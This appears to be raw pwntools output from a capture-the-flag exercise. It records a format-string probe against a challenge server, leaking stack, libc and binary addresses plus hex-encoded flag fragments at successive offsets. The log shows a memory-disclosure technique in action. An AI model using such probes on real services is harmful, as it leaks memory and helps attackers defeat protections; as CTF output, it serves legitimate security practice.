[x] Opening connection to puzzler7.imaginaryctf.org on port 2001
[x] Opening connection to puzzler7.imaginaryctf.org on port 2001: Trying 137.184.207.224
[+] Opening connection to puzzler7.imaginaryctf.org on port 2001: Done
[*] 0 %0$p.TMP
[*] 4 0x7f982dbbfb23.TMP
[*] 8 0xfbad208b.TMP
[*] 12 0x7f982daba992.TMP
[*] 16 (nil).TMP
[*] 20 (nil).TMP
[*] 24 0x5f73315f73316874.TMP
[*] 28 0x726333735f336874.TMP
[*] 32 0xa7474747433.TMP
[*] 36 (nil).TMP
[*] 40 0xa00.TMP
[*] 44 (nil).TMP
[*] 48 (nil).TMP
[*] 52 (nil).TMP
[*] 56 (nil).TMP
[*] 60 (nil).TMP
[*] 64 (nil).TMP
[*] 68 (nil).TMP
[*] 72 (nil).TMP
[*] 76 (nil).TMP
[*] 80 (nil).TMP
[*] 84 0x7f982dbc06a0.TMP
[*] 88 (nil).TMP
[*] 92 0x7f982da34475.TMP
[*] 96 0x4d542e7024343225.TMP
[*] 100 0x7f982d000a50.TMP
[*] 104 (nil).TMP
[*] 108 (nil).TMP
[*] 112 0x7f982dbbc600.TMP
[*] 116 0x7f982da3062d.TMP
[*] 120 0x7f982dbc06a0.TMP
[*] 124 0x7f982da27765.TMP
[*] 128 (nil).TMP
[*] 132 0x7ffe0e433ce0.TMP
[*] 136 0x7ffe0e433e08.TMP
[*] 140 0x4012e2.TMP
[*] 144 (nil).TMP
[*] 148 0x4011e0.TMP
[*] 152 0x7ffe0e433cf0.TMP
[*] 156 0x4012f0.TMP
[*] 160 0x1.TMP
[*] 164 0x7f982d9cfd90.TMP
[*] 168 (nil).TMP
[*] 172 0x4012e2.TMP
[*] 176 0x100000000.TMP
[*] 180 0x7ffe0e433e08.TMP
[*] 184 (nil).TMP
[*] 188 0x38a00fcb25b2fb24.TMP
[*] 192 0x7ffe0e433e08.TMP
[*] 196 0x4012e2.TMP
[*] 200 (nil).TMP
[*] 204 0x7f982dc11040.TMP
[*] 208 0xc75c134d5fb0fb24.TMP
[*] 212 0xc79054f2df38fb24.TMP
[*] 216 (nil).TMP
[*] 220 (nil).TMP
[*] 224 (nil).TMP
[*] 228 (nil).TMP
[*] 232 (nil).TMP
[*] 236 0x339847d2d3003a00.TMP
[*] 240 (nil).TMP
[*] 244 0x7f982d9cfe40.TMP
[*] 248 0x7ffe00000000.TMP
[*] 252 0x7ffe0e433e18.TMP
[*] 256 0x7f982dc122e0.TMP
[*] 260 (nil).TMP
[*] 264 (nil).TMP
[*] 268 0x4010a0.TMP
[*] 272 0x7ffe0e433e00.TMP
[*] 276 (nil).TMP
[*] 280 (nil).TMP
[*] 284 0x4010ca.TMP
[*] 288 0x7ffe0e433df8.TMP
[*] 292 0x1c.TMP
[*] 296 0x1.TMP
[*] 300 0x7ffe0e434fa4.TMP
[*] 304 (nil).TMP
[*] 308 0x7ffe0e434fac.TMP
[*] 312 0x7ffe0e434fb5.TMP
[*] 316 0x7ffe0e434fc1.TMP
[*] 320 (nil).TMP
[*] 324 0x21.TMP
[*] 328 0x7ffe0e4a4000.TMP
[*] 332 0x10.TMP
[*] 336 0xf8bfbff.TMP
[*] 340 0x6.TMP
[*] 344 0x1000.TMP
[*] 348 0x11.TMP
[*] 352 0x64.TMP
[*] 356 0x3.TMP
[*] 360 0x400040.TMP
[*] 364 0x4.TMP
[*] 368 0x38.TMP
[*] 372 0x5.TMP
[*] 376 0xd.TMP
[*] 380 0x7.TMP
[*] 384 0x7f982dbd7000.TMP
[*] 388 0x8.TMP
[*] 392 (nil).TMP
[*] 396 0x9.TMP
[*] Closed connection to puzzler7.imaginaryctf.org port 2001
